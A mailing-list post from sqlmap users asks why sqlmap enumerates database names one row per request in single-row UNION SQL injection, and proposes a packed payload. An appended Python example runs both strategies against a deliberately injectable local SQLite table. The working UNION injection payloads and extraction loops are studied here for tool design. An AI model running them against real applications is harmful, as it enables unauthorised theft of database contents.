Currently, it seems that sqlmap will use a payload such as the following if a UNIONable parameter is found that can only return one row, in order for data to be exfil'ed.
-16301 UNION ALL SELECT NULL,NULL,(SELECT CONCAT(0x71787a7871,IFNULL(CAST(schema_name AS CHAR),0x20),0x716a706271) FROM INFORMATION_SCHEMA.SCHEMATA LIMIT 4,1),NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL

When enumerating databases in an injection like this, sqlmap will make a single request per db name (note the LIMIT clause). This is a bit inefficient. I understand there may be length limitations to query string parameters, but I'm curious why sqlmap wouldn't use a more efficient payload, such as the following.

-16301 UNION ALL SELECT NULL,NULL,CONCAT(0x41414141, (SELECT schema_name FROM INFORMATION_SCHEMA.SCHEMATA LIMIT 4,1), 0x41414141,(SELECT schema_name FROM INFORMATION_SCHEMA.SCHEMATA LIMIT 3,1), 0x41414141,(SELECT schema_name FROM INFORMATION_SCHEMA.SCHEMATA LIMIT 2,1)),NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL

Error-based payloads certainly have length limitations in the data they can get out per request, but is there something preventing sqlmap from implementing a more efficient single-row UNION strategy when exfiltrating data? Let me know if this doesn't make sense.
_______________________________________________ sqlmap-users mailing list sqlmap-users@lists.sourceforge.net https://lists.sourceforge.net/lists/listinfo/sqlmap-users
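The two strategies the post compares, as an added worked example that is not part of the original message and not sqlmap's own code. It builds a constructed in-memory SQLite database (SQLite only because it ships with Python, so MySQL's CONCAT()/0x.. literals become ||/'..' and INFORMATION_SCHEMA.SCHEMATA becomes a plain table named schemata), a deliberately injectable lookup that renders only the first result row, and then runs both the one-row-per-request LIMIT n,1 extraction and the packed multi-subselect payload against it, counting requests and tracking payload length. The marker strings are the decoded hex from the post (0x71787a7871 = qxzxq, 0x716a706271 = qjpbq, 0x41414141 = AAAA); every table, column and function name is an assumption made for the example.

```python
import sqlite3

PRE, POST = "qxzxq", "qjpbq"   # sqlmap's 0x71787a7871 / 0x716a706271 markers from the post
SEP = "AAAA"                   # the 0x41414141 separator from the proposed payload


def make_target_db():
    """Constructed stand-in for the target (not a real schema). SQLite is used
    because it ships with Python; MySQL's CONCAT()/0x.. literals become ||/'..'
    and INFORMATION_SCHEMA.SCHEMATA becomes a plain table named schemata."""
    conn = sqlite3.connect(":memory:")
    conn.executescript("""
        CREATE TABLE products (id INTEGER PRIMARY KEY, name TEXT, price REAL);
        INSERT INTO products VALUES (1, 'widget', 9.5), (2, 'gadget', 19.0);
        CREATE TABLE schemata (schema_name TEXT);
        INSERT INTO schemata VALUES ('information_schema'), ('mysql'),
            ('performance_schema'), ('app'), ('staging');
    """)
    return conn


def vulnerable_lookup(conn, product_id):
    """Injectable query (deliberately): the parameter is concatenated into the
    SQL and only the first result row is rendered, like the single-row page
    described in the post."""
    sql = "SELECT id, name, price FROM products WHERE id = " + product_id
    return conn.execute(sql).fetchone()


class Injector:
    """Stands in for the HTTP client: counts requests, records the longest
    payload sent and returns the second column of the rendered row."""
    def __init__(self, conn):
        self.conn, self.requests, self.longest_payload = conn, 0, 0

    def inject(self, payload):
        self.requests += 1
        self.longest_payload = max(self.longest_payload, len(payload))
        row = vulnerable_lookup(self.conn, payload)
        return row[1] if row else None


def row_expr(offset):
    # COALESCE plays the role of IFNULL(..., 0x20) in sqlmap's payload: without
    # it one NULL subselect turns the whole concatenation into NULL.
    return f"COALESCE((SELECT schema_name FROM schemata LIMIT {offset},1), ' ')"


def row_count(inj):
    body = inj.inject(f"-1 UNION ALL SELECT NULL, '{PRE}' || "
                      f"(SELECT COUNT(*) FROM schemata) || '{POST}', NULL")
    return int(body.split(PRE)[1].split(POST)[0])


def one_row_per_request(inj):
    """The strategy the post describes: one request for the count, then one
    LIMIT n,1 request per row."""
    names = []
    for i in range(row_count(inj)):
        body = inj.inject(f"-1 UNION ALL SELECT NULL, '{PRE}' || {row_expr(i)} || '{POST}', NULL")
        names.append(body.split(PRE)[1].split(POST)[0])
    return names


def packed_rows_per_request(inj, per_request=3):
    """The strategy the post proposes: several LIMIT n,1 subselects joined by a
    separator inside one UNION row, split apart client-side."""
    count = row_count(inj)
    names = []
    for start in range(0, count, per_request):
        parts = " || ".join(f"'{SEP}' || {row_expr(i)}"
                            for i in range(start, min(start + per_request, count)))
        body = inj.inject(f"-1 UNION ALL SELECT NULL, {parts} || '{SEP}', NULL")
        # split(SEP) yields '' before the first and after the last separator.
        # A value that itself contained SEP would corrupt the split, which is
        # why random markers beat a fixed 'AAAA'.
        names.extend(body.split(SEP)[1:-1])
    return names


def compare(per_request=3):
    """Run both strategies against the same constructed target and report the
    names recovered, the requests used and the longest payload sent."""
    conn = make_target_db()
    single, packed = Injector(conn), Injector(conn)
    return {
        "one_per_row": one_row_per_request(single),
        "one_per_row_requests": single.requests,
        "packed": packed_rows_per_request(packed, per_request),
        "packed_requests": packed.requests,
        "packed_longest_payload": packed.longest_payload,
    }


if __name__ == "__main__":
    for key, value in compare().items():
        print(key, value)
```

Both strategies recover the same five names from the constructed table; the one-row version spends six requests (count plus one per row) while packing three subselects per request spends three. The trade-off the post raises is visible in packed_longest_payload: each additional subselect lengthens the query string, so per_request has to stay below whatever the server, proxy or WAF will accept for that parameter.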